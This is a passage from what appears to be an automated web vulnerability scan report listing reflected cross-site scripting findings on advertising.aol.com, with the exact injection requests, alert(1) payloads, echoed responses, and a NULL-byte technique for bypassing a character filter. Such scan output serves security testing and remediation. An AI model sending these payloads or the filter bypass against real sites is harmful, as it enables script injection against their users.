Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:01:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:01:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/nai.php44bcc"-alert(1)-"bb366ec97aa?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,a
...[SNIP]...

6.66. http://advertising.aol.com/nai/nai.php [action_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/nai/nai.php

Issue detail

The value of the action_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007bbed'><script>alert(1)</script>9ecd2285493 was submitted in the action_id parameter. This input was echoed as 7bbed'><script>alert(1)</script>9ecd2285493 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /nai/nai.php?action_id=3%007bbed'><script>alert(1)</script>9ecd2285493 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 10:59:37 GMT
Content-Type: text/html
Content-Length: 13896

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3.7bbed'><script>alert(1)</script>9ecd2285493&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9962693' height='1' width='1'>
...[SNIP]...

6.67. http://advertising.aol.com/token/0/2/1170877546/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/0/2/1170877546/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb106"-alert(1)-"2a8f8f75cb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fb106"-alert(1)-"2a8f8f75cb4/0/2/1170877546/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/fb106"-alert(1)-"2a8f8f75cb4/0/2/1170877546/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.68. http://advertising.aol.com/token/0/3/1885310732/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/0/3/1885310732/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8b5b"-alert(1)-"30d7f6c4bc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /b8b5b"-alert(1)-"30d7f6c4bc8/0/3/1885310732/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:49:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:49:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b8b5b"-alert(1)-"30d7f6c4bc8/0/3/1885310732/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.69. http://advertising.aol.com/token/1/1/1462706141/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/1/1/1462706141/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15615"-alert(1)-"5700fdbf314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /15615"-alert(1)-"5700fdbf314/1/1/1462706141/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:12:41 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:12:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/15615"-alert(1)-"5700fdbf314/1/1/1462706141/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.70. http://advertising.aol.com/token/1/3/1308197307/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/1/3/1308197307/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c8fc"-alert(1)-"acb9261f595 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /3c8fc"-alert(1)-"acb9261f595/1/3/1308197307/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:49:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:49:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/3c8fc"-alert(1)-"acb9261f595/1/3/1308197307/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.71. http://advertising.aol.com/token/2/2/2011729621/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/2/2/2011729621/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 396da"-alert(1)-"04d2d0ed828 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /396da"-alert(1)-"04d2d0ed828/2/2/2011729621/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:13:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:13:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/396da"-alert(1)-"04d2d0ed828/2/2/2011729621/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.72. http://advertising.aol.com/token/2/3/868831419/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/2/3/868831419/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3332d"-alert(1)-"810b85bd8ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /3332d"-alert(1)-"810b85bd8ec/2/3/868831419/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:51:09 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:51:09 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/3332d"-alert(1)-"810b85bd8ec/2/3/868831419/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.73. http://advertising.aol.com/token/3/2/1144859041/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/3/2/1144859041/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4caa4"-alert(1)-"eac3de24a0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4caa4"-alert(1)-"eac3de24a0a/3/2/1144859041/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4caa4"-alert(1)-"eac3de24a0a/3/2/1144859041/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.74. http://advertising.aol.com/token/3/3/963398391/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/3/3/963398391/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58984"-alert(1)-"db9af180a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /58984"-alert(1)-"db9af180a85/3/3/963398391/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:51:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:51:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/58984"-alert(1)-"db9af180a85/3/3/963398391/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.75. http://advertising.aol.com/token/4/1/1214941173/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/4/1/1214941173/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dc75"-alert(1)-"223c83815de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /6dc75"-alert(1)-"223c83815de/4/1/1214941173/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:12:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:12:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6dc75"-alert(1)-"223c83815de/4/1/1214941173/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.76. http://advertising.aol.com/token/4/3/1727096706/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/4/3/1727096706/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cff9"-alert(1)-"351e258ca98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /7cff9"-alert(1)-"351e258ca98/4/3/1727096706/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:49:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:49:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7cff9"-alert(1)-"351e258ca98/4/3/1727096706/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.77. http://advertising.aol.com/token/5/2/2011695027/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/5/2/2011695027/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e79f0"-alert(1)-"d038ede19e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /e79f0"-alert(1)-"d038ede19e7/5/2/2011695027/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e79f0"-alert(1)-"d038ede19e7/5/2/2011695027/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
